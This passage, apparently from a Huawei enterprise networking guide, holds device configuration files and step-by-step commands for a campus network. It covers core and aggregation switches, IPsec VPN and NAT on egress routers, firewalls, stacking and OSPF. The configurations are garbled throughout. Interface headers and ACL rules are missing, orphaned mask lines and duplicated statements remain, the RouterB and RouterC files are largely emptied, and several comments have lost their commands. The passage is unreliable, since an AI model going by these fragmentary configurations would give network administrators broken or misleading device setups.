the public network but users (such as PC3) in Department B cannot.
----End
Configuration Files
l Core switch configuration file
#
sysname CORE
#
vlan batch 100
#
interface Vlanif100
ip address 10.10.100.4 255.255.255.0
#
interface Eth-Trunk3
port link-type trunk
port trunk allow-pass vlan 100
mode lacp
#
mode lacp
#
interface GigabitEthernet0/0/3
eth-trunk 3
#
eth-trunk 4
#
eth-trunk 3
#
eth-trunk 4
#
ospf 1 router-id 10.3.3.3
area 0.0.0.0
network 10.10.100.0 0.0.0.255
network 10.10.10.0 0.0.0.255
network 10.10.20.0 0.0.0.255
network 10.10.30.0 0.0.0.255
#
ip route-static 0.0.0.0 0.0.0.0 10.10.100.1
#
return

l RouterA configuration file

#
sysname RouterA
#
acl number 3000
rule 5 deny ip source 10.10.10.0 0.0.0.255 destination 10.10.200.0 0.0.0.255
rule 10 deny ip source 10.10.20.0 0.0.0.255 destination 10.10.200.0
0.0.0.255
rule 15 permit ip source 10.10.10.0 0.0.0.255
acl number 3001
rule 5 permit ip source 10.10.10.0 0.0.0.255 destination 10.10.200.0
0.0.0.255
0.0.0.255
#
ipsec proposal tran1
esp authentication-algorithm sha2-256
esp encryption-algorithm aes-128
#
ike proposal 5
encryption-algorithm aes-cbc-128
#
ike peer vpn v1
pre-shared-key cipher "@J*U2S*(7F,YWX*NZ55OA!!
ike-proposal 5
dpd type periodic
dpd idle-time 10
remote-address 203.10.1.2
#
ipsec policy ipsec_vpn 10 isakmp
security acl 3001
ike-peer vpn
proposal tran1
#
undo portswitch
mode lacp-static
#
interface Eth-Trunk1.100
dot1q termination vid 100
ip address 10.10.100.2 255.255.255.0
vrrp vrid 1 virtual-ip 10.10.100.1
vrrp vrid 1 priority 120
vrrp vrid 1 track interface GigabitEthernet1/0/0 reduced 40
arp broadcast enable
#
ip address 202.10.1.2 255.255.255.0
ipsec policy ipsec_vpn
nat server protocol tcp global 202.10.100.3 www inside 10.10.30.2 8080
nat outbound 3000
#
eth-trunk 1
#
eth-trunk 1
#
area 0.0.0.0
network 10.10.100.0 0.0.0.255
#
ip route-static 0.0.0.0 0.0.0.0 202.10.1.1
#
return
l RouterB configuration file

#
sysname RouterB

#
acl number 3000
0.0.0.255
acl number 3001
0.0.0.255
0.0.0.255
#
#
ike proposal 5
#
ike peer vpn v1
ike-proposal 5
dpd type periodic
dpd idle-time 10
#
security acl 3001
ike-peer vpn
proposal tran1
#
undo portswitch
mode lacp-static
#
ip address 10.10.100.3 255.255.255.0
#
ip address 202.10.2.2 255.255.255.0
nat server protocol tcp global 202.10.100.3 www inside 10.10.30.2 8080
nat outbound 3000
#
eth-trunk 1
#
eth-trunk 1
#
area 0.0.0.0
network 10.10.100.0 0.0.0.255
#
ip route-static 0.0.0.0 0.0.0.0 202.10.2.1
#
return
l Configuration file of the branch egress router RouterC
#
sysname RouterC
#
acl number 3000
0.0.0.255

acl number 3001

0.0.0.255
0.0.0.255
#
#
ike proposal 5
#
ike peer vpnr1 v1
ike-proposal 5
dpd type periodic
dpd idle-time 10
#
ike peer vpnr2 v1
ike-proposal 5
dpd type periodic
dpd idle-time 10
#
security acl 3001
ike-peer vpnr1
proposal tran1
#
security acl 3001
ike-peer vpnr2
proposal tran1
#
ip address 203.10.1.2 255.255.255.0
nat outbound 3000
#
ip route-static 0.0.0.0 0.0.0.0 203.10.1.1
#
return
l Configuration file of the headquarters carrier router RouterD

#
sysname RouterD
#
ip address 202.10.1.1 255.255.255.0
#
ip address 202.10.2.1 255.255.255.0
#
ip route-static 202.10.100.0 255.255.255.0 202.10.1.2 preference 40
ip route-static 202.10.100.0 255.255.255.0 202.10.2.2
#
return
l Configuration file of the branch carrier router RouterE

#
sysname RouterE
#
ip address 203.10.1.1 255.255.255.0
#
return

2.2 Example for Configuring the Egress of a Large-scale

Campus (Firewalls Are Connected to Core Switches in In-
line Mode)
As shown in Figure 2-2, at the egress of a large-scale campus, core switches are directly
connected to firewalls and connected to egress gateways through the firewalls. The firewalls
filter incoming and outgoing traffic of the campus to ensure network security. The network
requirements are as follows:
l Users on the internal network use private IP addresses and user IP addresses are
allocated using DHCP.
l Users in department A can access the Internet, and users in department B cannot access
the Internet.
l Users on internal and external networks can access the HTTP server.
l Each node uses the redundancy design to ensure network reliability.

Figure 2-2 Networking for configuring the egress of a large-scale campus (firewalls are
connected to core switches in in-line mode)
Internet
Access Access
point point
GE0/0/2 GE0/0/2
Router 1 Router 2
GE0/0/1 GE0/0/1
OSPF 0
GE1/0/1 GE1/0/1
GE1/0/7 GE1/0/7
FW 1 FW 2
GE2/0/4 GE2/0/4
GE2/0/3 GE2/0/3
Eth-Trunk 10 Eth-Trunk 20
Swich1 Swich2
(master) (standby)
CSS
HTTP server

OSPF 1 OSPF 2
Department A Department B
AGG1 AGG2
Switch3 Switch4 Switch5 Switch6

(master) (standby) (master) (standby)

Deployment
l Routing deployment
– Router ID: Configure a loopback interface address as the router ID on each device.
– Add egress routers, firewalls, and core switches to OSPF area 0. Configure egress
routers as Autonomous System Border Routers (ASBRs) and core switches as Area
Border Routers (ABRs).
– Configure Open Shortest Path First (OSPF) areas 1 and 2 for departments A and B,
respectively, and configure the two OSPF areas as Not-So-Stubby Areas (NSSAs)
to reduce the number of LSAs transmitted between OSPF areas.
– To guide uplink traffic on each device, configure a default route pointing to the
firewall on the core switch, configure a default route pointing to the egress router on
the firewall, and configure a default route pointing to the address of the
interconnected interface (public gateway address) of the carrier's device.
l Reliability deployment
You are advised to use CSS+iStack+Eth-Trunk to build a loop-free Ethernet.
– Deploy cluster switch system (CSS) on core switches and intelligent Stack (iStack)
on aggregation switches to ensure device-level reliability.
– To improve link reliability, use Eth-Trunks between core switches and firewalls,
between core switches and aggregation switches, and between aggregation switches
and access switches.
– Deploy the Huawei Redundancy Protocol (HRP) on firewalls to implement load
balancing.
l Dynamic Host Configuration Protocol (DHCP) deployment
– Configure the core switch as the DHCP server to allocate IP addresses to users.
– Configure the DHCP relay function on the aggregation switch to ensure that the
DHCP server can allocate IP addresses to users.
l Network Address Translation (NAT) deployment
– To ensure that users on the internal network can access the Internet, configure NAT
on uplink interfaces of the two egress routers to translate private addresses into
public addresses. Configure an access control list (ACL) to match the source IP
address of department A so that users of department A can access the Internet and
users of department B cannot access the Internet.
– To ensure that users on the external network can access the HTTP server, configure
the NAT server on two egress routers.
l Security deployment
Configure security policies on firewalls to filter traffic and ensure network security.
Device planning
Device Type Device Model
Router1 and Router2 Huawei AR3600 series routers
FW1 and FW2 Huawei USG9000 series firewall
Core switches that constitute a Huawei S7700/S9700/S12700 switches

CSS

Device Type Device Model
Aggregation switches that Huawei S5720EI series switches (service interface

constitute an iStack system stacking)
Data Plan
Device Interfac Membe VLANI IP Remote Remote Interface
e r F Addres Device Number
Numbe Interfac Interfac s
r e e
Router1 GE0/0/1 - - 10.1.1.1/ FW1 GE1/0/1

24
GE0/0/2 - - 202.10.1 Assume that the interface

.1/24 connected to an interface of a
carrier's device and the IP
address is a public one allocated
by the carrier.
Router2 GE0/0/1 - - 10.2.1.1/ FW2 GE1/0/1

24
GE0/0/2 - - 202.10.2 Assume that the interface

.1/24 connected to an interface of a
carrier's device and the IP
address is a public one allocated
by the carrier.
FW1 GE1/0/1 - - 10.1.1.2/ Router1 GE0/0/1

24
GE1/0/7 - - 10.10.1. FW2 GE1/0/7

1/24
Eth- GE2/0/3 - 10.3.1.1/ CSS Eth-Trunk 10

Trunk10 24
GE2/0/4
FW2 GE1/0/1 - - 10.2.1.2/ Router2 GE0/0/1

24
GE1/0/7 - - 10.10.1. FW1 GE1/0/7

2/24
Eth- GE2/0/3 - 10.4.1.1/ CSS Eth-Trunk 20

Trunk 20 24
GE2/0/4
CSS GE1/1/0/ - VLANIF 10.100.1 HTTP Ethernet interface

10 300 .1 server
Eth- GE1/1/0/ - 10.3.1.2/ FW1 Eth-Trunk 10

Trunk 10 3 24

Device Interfac Membe VLANI IP Remote Remote Interface

e r F Addres Device Number
Numbe Interfac Interfac s
r e e
GE2/1/0/
3
Eth- GE1/1/0/ - 10.4.1.2/ FW2 Eth-Trunk 20

Trunk 20 4 24
GE2/1/0/
4
Eth- GE1/2/0/ VLANIF 10.5.1.1/ AGG1 Eth-Trunk 100

Trunk 3 100 24
100
GE2/2/0/
3
Eth- GE1/2/0/ VLANIF 10.6.1.1/ AGG2 Eth-Trunk 200

Trunk 4 200 24
200
GE2/2/0/
4
AGG1 Eth- GE1/0/1 VLANIF 10.5.1.2/ CSS Eth-Trunk 100

Trunk 100 24
100 GE2/0/1
Eth- GE1/0/5 VLANIF 192.168. Assume that the interface is

Trunk 500 1.1/24 used to connect to department A
500 GE2/0/5 and its IP address is the gateway
address of department A.
AGG2 Eth- GE1/0/1 VLANIF 10.6.1.2/ CSS

Trunk 200 24
100 GE2/0/1
Eth- GE1/0/5 VLANIF 192.168. Assume that the interface is

Trunk 600 2.1/24 used to connect to department B
600 GE2/0/5 and its IP address is the gateway
address of department B.
HTTP Ethernet - - 10.100.1 CSS GE1/1/0/

server interface .10/24 10
The configuration roadmap is as follows.

Step Configuration Roadmap Involved Product
1 (1) Configure CSS on core Core switches (Switch1 and Switch2) and
switches. aggregation switches (Switch3, Switch4,
(2) Configure iStack on Switch5, and Switch6)
aggregation switches.
2 Configure Eth-Trunks to Core switches (CSS), firewalls (FW1 and

improve the link reliability. FW2), and aggregation switches (AGG1
(1) Configure Eth-Trunks and AGG2)
between core switches (CSS)
and firewalls.
(2) Configure Eth-Trunks
between core switches (CSS)
and aggregation switches
(AGG).
(3) Configure Eth-Trunks
between aggregation switches
and access switches.
3 Assign an IP address to each Routers (Router1 and Router2), firewalls

interface. (FW1 and FW2), core switches (CSS),
(1) Configure IP addresses and aggregation switches (AGG1 and
for uplink and downlink AGG2)
interfaces of routers.
(2) Configure IP addresses
for uplink and downlink
interfaces of firewalls.
interfaces of core switches.
interfaces of aggregation
switches.

4 Configure a routing protocol. Routers (Router1 and Router2), firewalls

Configure OSPF on the (FW1 and FW2), and core switches (CSS)
internal network.
(1) Configure OSPF area 0 on
uplink interfaces of routers,
firewalls, and core switches.
(2) Configure OSPF areas 1
and 2 on core and
aggregation switches,
configure the two OSPF areas
as NSSAs, and add downlink
interfaces of core switches to
NSSAs.
(3) Configure a default route
pointing to the firewall on the
core switch, configure a
default route pointing to the
egress router on the firewall,
and configure a default route
pointing to the address of the
interconnected interface
(public gateway address) of
the carrier's device.
5 Configure zones that Firewalls (FW1 and FW2)

interfaces belong to.
(1) Add the interface
connected to the external
network to the untrusted
zone.
(2) Add the interface
connected to the internal
network to the trusted zone.
(3) Add the heartbeat
interface enabled with HRP
to the DMZ.
6 Configure HRP. Firewalls (FW1 and FW2)

(1) Associate VRRP Group
Management Protocol
(VGMP) groups with uplink
and downlink interfaces.
(2) Specify heartbeat
interfaces and enable HRP.
(3) Enable quick session
backup to implement load
balancing between two
firewalls.

7 Configure DHCP. Core switches (CSS) and aggregation

(1) Configure the DHCP switches (AGG1 and AGG2)
server on core switches and
specify the address pool and
gateway address.
(2) Configure the DHCP
relay function on aggregation
switches.
8 Configure NAT. Egress routers (Router1 and Router2)

(1) Configure NAT on two
egress routers so that users of
department A can access the
Internet and users of
department B cannot access
the Internet.
(2) Configure the NAT server
on two egress routers so that
users on the external network
can access the HTTP server.
9 Configure attack defense and Firewalls

enable defense against SYN
Flood attacks and HTTP
Flood attacks on firewalls to
protect internal servers
against attacks.
Procedure
Step 1 Configure CSS on core switches.
1. Connect cables of CSS cards. CSS card EH1D2VS08000 is used as an example.

Figure 2-3 CSS networking
NOTE
– One CSS card can only be connected to one CSS card in the other chassis but not the local
chassis.
– An interface in group 1 of a CSS card can be connected to any interface in group 1 of the CSS
card on the other chassis. The requirements for interfaces in group 2 are the same.
– CSS cards have the same number of cluster cables connected. (If the CSS cards have different
numbers of cluster cables connected, the total cluster bandwidth depends on the cluster with
the least cluster cables connected.) In addition, interfaces on CSS cards are connected based on
the interface number.
2. Configure the CSS function on Switch1 and use CSS card connection (the default value
does not need to be configured). Use the default CSS ID 1 (the default value does not
need to be configured) and set the CSS priority to 100.
[HUAWEI] set css mode css-card //Default setting. You do not need to run
this command. The step is used for reference.
[HUAWEI] set css id 1 //Default setting. You do not need to run this
command. The step is used for reference.
[HUAWEI] set css priority 100 //The default CSS priority is 1. Change the
priority of the master switch to be higher than that of the standby switch.
[HUAWEI] css enable
Warning: The CSS configuration takes effect only after the system is
rebooted. The next CSS mode is CSS-Card. Reboot now? [Y/N]:Y //Restart the
switch.
3. Configure the CSS function on Switch2. Use CSS card connection (the default value
does not need to be configured). Set the CSS ID to 2 and use default CSS priority 1 (the
default value does not need to be configured).
[HUAWEI] set css id 2 //The default CSS ID is 1. Change the CSS ID to 2.
[HUAWEI] css enable
rebooted. The next CSS mode is CSS-Card. Reboot now? [Y/N]:Y //Restart the
switch.

4. Check the CSS status after the switches restart.

The MASTER indicator on the MPU is steady green, as shown in Figure 2-4.
– On Switch1, the CSS ID indicators numbered 1 on both MPUs are steady green. On
Switch2, the CSS ID indicators numbered 2 on both MPUs are steady green.
– The LINK/ALM indicators of interfaces on all CSS cards connected to cluster
cables are steady green.
– The MASTER indicators on all CSS cards in the active chassis are steady green,
and the MASTER indicators on all CSS cards in the standby chassis are off.
Figure 2-4 Indicators of the MPU and CSS card
NOTE
After the CSS is established, subsequent operations will be performed on the master switch and
data will be automatically synchronized to the standby switch. In a CSS, the physical interface
number is in the format of interface type chassis ID/slot ID/interface card ID/interface sequence
number, for example, 10GE1/1/0/9.
Step 2 Configure iStack on aggregation switches. S5720EI series switches are used as an example.
Service interface stacking is used.
NOTE
Switch3 and Switch4 are used as an example. The configurations of Switch5 and Switch6 are similar,
and are not mentioned here.
Connect cables after the iStack configuration is complete.
1. Configure logical stack interfaces and add physical member interfaces to them.
NOTE
Physical member interfaces of logical stack interface stack-port n/1 on one switch can only be
connected to the interfaces of stack-port n/2 on a neighboring switch.
# Configure service interface GE0/0/28 on Switch3 as the physical member interface and
add it to the corresponding logical stack interface.

[Switch3] interface stack-port 0/1

[Switch3-stack-port0/1] port interface gigabitethernet 0/0/28 enable
Warning: Enabling stack function may cause configuration loss on the
interface, continue?[Y/N]:Y
Info: This operation may take a few seconds. Please wait for a moment.......
[Switch3-stack-port0/1] quit
# Configure service interface GE0/0/28 on Switch4 as the physical member interface and
add it to the corresponding logical stack interface.
[Switch4] interface stack-port 0/2
[Switch4-stack-port0/2] port interface gigabitethernet 0/0/28 enable
Warning: Enabling stack function may cause configuration loss on the
interface, continue?[Y/N]:Y
Info: This operation may take a few seconds. Please wait for a moment.......
[Switch4-stack-port0/2] quit
2. Configure stack IDs and stack priorities.

# Set the stack priority of Switch3 to 200.
[Switch3] stack slot 0 priority 200
Warning: Please do not frequently modify Priority, it will make the stack
split, continue?[Y/N]:Y
# Set the stack ID of Switch3 to 1.

[Switch3] stack slot 0 renumber 1
Warning: All the configurations related to the slot ID will be lost after the
slot ID is modified.
Please do not frequently modify slot ID, it will make the stack split.
Continue?[Y/N]:Y
Info: Stack configuration has been changed, and the device needs to restart
to make the configuration effective.
# Set the stack ID of Switch4 to 2.

[Switch4] stack slot 0 renumber 2
Warning: All the configurations related to the slot ID will be lost after the
slot ID is modified.
Please do not frequently modify slot ID, it will make the stack split.
Continue?[Y/N]:Y
Info: Stack configuration has been changed, and the device needs to restart
to make the configuration effective.
3. Power off Switch3 and Switch and connect GE0/0/28 interfaces using the SFP+ stack
cable.
NOTE
Run the save command to save the configurations before you power off the switches.
stack-port 0/1 of one switch must be connected to stack-port 0/2 of another switch. Otherwise, the
stack cannot be set up.
Figure 2-5 Stack networking

GE0/0/28 GE0/0/28
iStack Link
Switch3 Switch4
4. Power on the switches.

To specify a member switch as the master switch, power on this switch first. For
example, if Switch3 needs to be used as the master switch, power on Switch3 and then
Switch4.
5. Check whether the stack is set up successfully.
[Switch3] display stack
Stack topology type: Link

Stack system MAC: 0018-82b1-6eb4

MAC switch delay time: 2 min
Stack reserved vlan: 4093
Slot of the active management port: --
Slot Role Mac address Priority Device type
-------------------------------------------------------------
1 Master 0018-82b1-6eb4 200 S5720-36C-EI-AC
2 Standby 0018-82b1-6eba 150 S5720-36C-EI-AC
You can check the master and standby switches, that is, the stack is set up successfully.
Step 3 Configure inter-chassis Eth-Trunks between the CSS and firewalls and between the CSS and
1. On firewalls, configure Eth-Trunks between the CSS and firewalls.
# On FW1, create Eth-Trunk 10 to connect to the CSS and add member interfaces to Eth-
Trunk 10.
[FW1] interface eth-trunk 10 //Create Eth-Trunk 10 to connect to the CSS.
[FW1-Eth-Trunk10] quit
[FW1] interface gigabitethernet 2/0/3
[FW1-GigabitEthernet2/0/3] eth-trunk 10
[FW1-GigabitEthernet2/0/3] quit
# On FW2, create Eth-Trunk 20 to connect to the CSS and add member interfaces to Eth-
Trunk 20.
[FW2] interface eth-trunk 20 //Create Eth-Trunk 20 to connect to the CSS.
2. In the CSS, configure inter-chassis Eth-Trunks between the CSS and firewalls and
between the CSS and aggregation switches.
# In the CSS, create Eth-Trunk 10 to connect to FW1 and add member interfaces to Eth-
Trunk 10.
[CSS] interface eth-trunk 10 //Create Eth-Trunk 10 to connect to FW1.
[CSS-Eth-Trunk10] quit
[CSS] interface gigabitethernet 1/1/0/3
[CSS-GigabitEthernet1/1/0/3] eth-trunk 10
[CSS-GigabitEthernet1/1/0/3] quit
# In the CSS, create Eth-Trunk 20 to connect to FW2 and add member interfaces to Eth-
Trunk 20.
[CSS] interface eth-trunk 20 //Create Eth-Trunk 20 to connect to FW2.
# In the CSS, create Eth-Trunk 100 to connect to AGG1 and add member interfaces to
Eth-Trunk 100.
[CSS] interface eth-trunk 100 //Create Eth-Trunk 100 to connect to AGG1.


# In the CSS, create Eth-Trunk 200 to connect to AGG2 and add member interfaces to
Eth-Trunk 200.
[CSS] interface eth-trunk 200 //Create Eth-Trunk 200 to connect to AGG2.
3. On aggregation switches, configure Eth-Trunks between the AGG and CSS and between
aggregation switches and access switches.
# Configure AGG1.
[AGG1] interface eth-trunk 100 //Create Eth-Trunk 100 to connect to the CSS.
[AGG1-Eth-Trunk100] quit
[AGG1] interface gigabitethernet 1/0/1
[AGG1-GigabitEthernet1/0/1] eth-trunk 100
[AGG1-GigabitEthernet1/0/1] quit
[AGG1] interface eth-trunk 500 //Create Eth-Trunk 500 to connect to the
access switch.
# Configure AGG2.
[AGG2] interface eth-trunk 200 //Create Eth-Trunk 200 to connect to the CSS.
[AGG2] interface eth-trunk 600 //Create Eth-Trunk 600 to connect to the
access switch.
Step 4 Assign an IP address to each interface.

# Configure Router1.
[Router1] interface loopback 0
[Router1-LoopBack0] ip address 1.1.1.1 32 //Configure the IP address as the
router ID.
[Router1-LoopBack0] quit
[Router1] interface gigabitethernet 0/0/2
[Router1-GigabitEthernet0/0/2] ip address 202.10.1.1 24 //Configure an IP
address for the interface connected to the external network.

[Router1-GigabitEthernet0/0/2] quit
[Router1-GigabitEthernet0/0/1] ip address 10.1.1.1 24 //Configure an IP address
for the interface connected to FW1.
[Router2] interface loopback 0
[Router2-LoopBack0] ip address 2.2.2.2 32 //Configure the IP address as the
router ID.
[Router2-LoopBack0] quit
[Router2-GigabitEthernet0/0/2] ip address 202.10.2.1 24 //Configure an IP
address for the interface connected to the external network.
[Router2-GigabitEthernet0/0/1] ip address 10.2.1.1 24 //Configure an IP address
for the interface connected to FW2.
# Configure FW1.
[FW1] interface loopback 0
[FW1-LoopBack0] ip address 3.3.3.3 32 //Configure the IP address as the router
ID.
[FW1-LoopBack0] quit
[FW1-GigabitEthernet1/0/1] ip address 10.1.1.2 24 //Configure an IP address for
the interface connected to Router1.
[FW1-GigabitEthernet1/0/7] ip address 10.10.1.1 24 //Configure an IP address
for the heartbeat interface enabled with HSB.
[FW1] interface eth-trunk 10
[FW1-Eth-Trunk10] ip address 10.3.1.1 24 //Configure an IP address for the Eth-
Trunk connected to the CSS.
# Configure FW2.
[FW2] interface loopback 0
[FW2-LoopBack0] ip address 4.4.4.4 32 //Configure the IP address as the Router
ID.
[FW2-LoopBack0] quit
[FW2-GigabitEthernet1/0/1] ip address 10.2.1.2 24 //Configure an IP address for
the interface connected to Router2.
[FW2-GigabitEthernet1/0/7] ip address 10.10.1.2 24 //Configure an IP address
for the heartbeat interface enabled with HSB.
[FW2] interface eth-trunk 20
[FW2-Eth-Trunk20] ip address 10.4.1.1 24 //Configure an IP address for the Eth-
Trunk connected to the CSS.
# Configure CSS.
[CSS] interface loopback 0
[CSS-LoopBack0] ip address 5.5.5.5 32 //Configure the IP address as the Router
ID.
[CSS-LoopBack0] quit
[CSS] interface eth-trunk 10
[CSS-Eth-Trunk10] undo portswitch //By default, an Eth-Trunk works in Layer 2
mode. To use an Eth-Trunk as a Layer 3 interface, run the undo portswitch command
to switch the Eth-Trunk to Layer 3 mode.
[CSS-Eth-Trunk10] ip address 10.3.1.2 24 //Configure an IP address for the Eth-
Trunk connected to FW1.

[CSS-Eth-Trunk20] undo portswitch //By default, an Eth-Trunk works in Layer 2

mode. To use an Eth-Trunk as a Layer 3 interface, run the undo portswitch command
to switch the Eth-Trunk to Layer 3 mode.
[CSS-Eth-Trunk20] ip address 10.4.1.2 24 //Configure an IP address for the Eth-
Trunk connected to FW2.
[CSS] vlan batch 100 200 300 //Create VLANs in a batch.
[CSS-Eth-Trunk100] port link-type hybrid
[CSS-Eth-Trunk100] port hybrid pvid vlan 100
[CSS-Eth-Trunk100] port hybrid untagged vlan 100
[CSS] interface vlanif 100
[CSS-Vlanif100] ip address 10.5.1.1 24 //Configure an IP address for the
interface connected to aggregation switch AGG1.
[CSS-Vlanif100] quit
[CSS-Eth-Trunk200] port link-type hybrid
[CSS-Eth-Trunk200] port hybrid pvid vlan 200
[CSS-Eth-Trunk200] port hybrid untagged vlan 200
interface connected to aggregation switch AGG2.
[CSS] interface gigabitethernet 1/1/0/10 //Enter the view of the interface
connected to the HTTP server.
[CSS-GigabitEthernet1/1/0/10] port link-type access
[CSS-GigabitEthernet1/1/0/10] port default vlan 300 //Add the access interface
to VLAN 300.
interface connected to the HTTP server.
# Configure AGG1.
[AGG1] interface loopback 0
[AGG1-LoopBack0] ip address 6.6.6.6 32 //Configure the IP address as the router
ID.
[AGG1-LoopBack0] quit
[AGG1] vlan batch 100 500
[AGG1] interface eth-trunk 100
[AGG1-Eth-Trunk100] port link-type hybrid
[AGG1-Eth-Trunk100] port hybrid pvid vlan 100
[AGG1-Eth-Trunk100] port hybrid untagged vlan 100
[AGG1] interface vlanif 100
[AGG1-Vlanif100] ip address 10.5.1.2 24 //Configure an IP address for the
interface connected to the CSS.
[AGG1-Vlanif100] quit
interface connected to the access switch and configure it as the gateway address
of department A.
# Configure AGG2.
[AGG2] interface loopback 0
[AGG2-LoopBack0] ip address 7.7.7.7 32 //Configure the IP address as the router
ID.
[AGG2-LoopBack0] quit
[AGG2] vlan batch 200 600


interface connected to the CSS.
interface connected to the access switch and configure it as the gateway address
of department B.
Step 5 On firewalls, configure security policies and zones that interfaces belong to.
# Add interfaces to zones.
[FW1] firewall zone trust
[FW1-zone-trust] add interface Eth-Trunk 10 //Add Eth-Trunk 10 connected to the
internal network to a trusted zone.
[FW1-zone-trust] quit
[FW1] firewall zone untrust
[FW1-zone-untrust] add interface gigabitethernet 1/0/1 //Add GE1/0/1 connected
to the external network to an untrusted zone.
[FW1-zone-untrust] quit
[FW1] firewall zone dmz
[FW1-zone-dmz] add interface gigabitethernet 1/0/7 //Add GE1/0/7 to the DMZ.
[FW1-zone-dmz] quit
[FW2-zone-trust] add interface Eth-Trunk 20 //Add Eth-Trunk 20 connected to the
internal network to a trusted zone.
[FW2-zone-untrust] add interface gigabitethernet 1/0/1 //Add GE1/0/1 connected
to the external network to an untrusted zone.
[FW2-zone-dmz] add interface gigabitethernet 1/0/7 //Add GE1/0/7 to the DMZ.
[FW2-zone-dmz] quit
# Configure security policies on FW1.

[FW1] policy interzone local untrust inbound
[FW1-policy-interzone-local-untrust-inbound] policy 2
[FW1-policy-interzone-local-untrust-inbound-2] policy source 10.1.1.1 mask 24 //
Configure a policy to permit the router in the untrusted zone to access the
firewall.
[FW1-policy-interzone-local-untrust-inbound-2] action permit
[FW1-policy-interzone-local-untrust-inbound-2] quit
[FW1-policy-interzone-local-untrust-inbound] quit
[FW1] policy interzone local trust outbound
[FW1-policy-interzone-local-trust-outbound] policy 1
[FW1-policy-interzone-local-trust-outbound-1] policy source 10.3.1.2 mask 24 //
Configure a policy to permit the device in the trusted zone to access the
firewall.
[FW1-policy-interzone-local-trust-outbound-1] policy source 10.5.1.1 mask
24 // //Configure a policy to permit the device in the trusted zone to access
the firewall.
the firewall.
[FW1-policy-interzone-local-outbound-inbound-1] action permit
[FW1-policy-interzone-local-outbound-inbound-1] quit
[FW1-policy-interzone-local-outbound-inbound] quit
[FW1] policy interzone trust untrust outbound
[FW1-policy-interzone-trust-untrust-outbound] policy 4

[FW1-policy-interzone-trust-untrust-outbound-4] policy source 192.168.1.1 mask

24 //Configure devices on network segment 192.168.1.0/24 to access the external
network.
[FW1-policy-interzone-trust-untrust-outbound-4] action permit
[FW1-policy-interzone-trust-untrust-outbound-4] quit
[FW1-policy-interzone-trust-untrust-outbound] quit
[FW1] policy interzone trust untrust inbound
[FW1-policy-interzone-trust-untrust-inbound] policy 3
[FW1-policy-interzone-trust-untrust-inbound-3] policy source 10.1.1.1 mask 24 //
Configure the device at 10.1.1.1 to access the internal network.
[FW1-policy-interzone-trust-untrust-inbound-3] action permit
[FW1-policy-interzone-trust-untrust-inbound-3] quit
[FW1-policy-interzone-trust-untrust-inbound] quit
# Configure security policies on FW2.

[FW2] policy interzone local untrust inbound
[FW2-policy-interzone-local-untrust-inbound] policy 2
[FW2-policy-interzone-local-untrust-inbound-2] policy source 10.2.1.1 mask 24 //
Configure a policy to permit the router in the untrusted zone to access the
firewall.
[FW2-policy-interzone-local-untrust-inbound-2] action permit
[FW2-policy-interzone-local-untrust-inbound-2] quit
[FW2-policy-interzone-local-untrust-inbound] quit
[FW2] policy interzone local trust outbound
[FW2-policy-interzone-local-trust-outbound] policy 1
the firewall.
the firewall.
the firewall.
[FW2-policy-interzone-local-dmz-inbound-1] action permit
[FW2-policy-interzone-local-dmz-inbound-1] quit
[FW2-policy-interzone-local-dmz-inbound] quit
[FW2] policy interzone trust untrust inbound
[FW2-policy-interzone-trust-untrust-inbound] policy 3
[FW2-policy-interzone-trust-untrust-inbound-3] policy source 10.2.1.1 mask 24 //
Configure the device at 10.2.1.1 to access the internal network.
[FW2-policy-interzone-trust-untrust-inbound-3] action permit
[FW2-policy-interzone-trust-untrust-inbound-3] quit
[FW2-policy-interzone-trust-untrust-inbound] quit
Step 6 Deploy routing.

1. Configure OSPF area 0 on uplink interfaces of routers, firewalls, and core switches.
[Router1] router id 1.1.1.1
[Router1] ospf 1 //Configure OSPF.
[Router1-ospf-1] area 0 //Configure a backbone area.
[Router1-ospf-1-area-0.0.0.0] network 10.1.1.0 0.0.0.255 //Configure the
device to advertise the network segment connected to FW1 to the OSPF backbone
area.
[Router1-ospf-1-area-0.0.0.0] quit
[Router1-ospf-1] quit
[Router2] router id 2.2.2.2
[Router2] ospf 1 //Configure OSPF.
[Router2-ospf-1] area 0 //Configure a backbone area.
[Router2-ospf-1-area-0.0.0.0] network 10.2.1.0 0.0.0.255 //Configure the
device to advertise the network segment connected to FW2 to the OSPF backbone
area.

# Configure FW1.
[FW1] router id 3.3.3.3
[FW1] ospf 1 //Configure OSPF.
[FW1-ospf-1] area 0 //Configure a backbone area.
[FW1-ospf-1-area-0.0.0.0] network 10.1.1.0 0.0.0.255 //Configure the device
to advertise the network segment connected to Router1 to the OSPF backbone
area.
to advertise the network segment connected to the CSS to the OSPF backbone
area.
[FW1-ospf-1-area-0.0.0.0] quit
[FW1-ospf-1] quit
# Configure FW2.
[FW2] router id 4.4.4.4
[FW2] ospf 1 //Configure OSPF.
[FW2-ospf-1] area 0 //Configure a backbone area.
[FW2-ospf-1-area-0.0.0.0] network 10.2.1.0 0.0.0.255 // //Configure the
device to advertise the network segment connected to Router2 to the OSPF
backbone area.
to advertise the network segment connected to the CSS to the OSPF backbone
area.
[FW2-ospf-1-area-0.0.0.0] quit
[FW2-ospf-1] quit
# Configure the CSS.

[CSS] router id 5.5.5.5
[CSS] ospf 1 //Configure OSPF.
[CSS-ospf-1] area 0 //Configure a backbone area.
[CSS-ospf-1-area-0.0.0.0] network 10.3.1.0 0.0.0.255 //Configure the device
to advertise the network segment connected to FW1 to the OSPF backbone area.
to advertise the network segment connected to FW2 to the OSPF backbone area.
[CSS-ospf-1-area-0.0.0.0] network 10.100.1.0 0.0.0.255 //Configure the
device to advertise the network segment connected to the HTTP server to the
OSPF backbone area.
[CSS-ospf-1-area-0.0.0.0] quit
[CSS-ospf-1] quit
2. Configure OSPF areas 1 and 2 on core and aggregation switches, configure the two
OSPF areas as NSSAs, and add downlink interfaces of core switches to NSSAs.
[CSS] ospf 1 //Configure OSPF.
[CSS-ospf-1] area 1 //Configure OSPF area 1.
to advertise the network segment connected to AGG1 to OSPF area 1.
[CSS-ospf-1-area-0.0.0.1] nssa //Configure OSPF area 1 as an NSSA.
[CSS-ospf-1] area 2 //Configure OSPF area 2.
to advertise the network segment connected to AGG2 to OSPF area 2.
[CSS-ospf-1-area-0.0.0.2] nssa //Configure OSPF area 1 as an NSSA.
[CSS-ospf-1] quit
# Configure AGG1.
[AGG1] ospf 1 //Configure OSPF.
[AGG1-ospf-1] area 1 //Configure OSPF area 1.
[AGG1-ospf-1-area-0.0.0.1] network 10.5.1.0 0.0.0.255 //Configure the
device to advertise the network segment connected to the CSS to OSPF area 1.
device to advertise the user network segment to OSPF area 1.
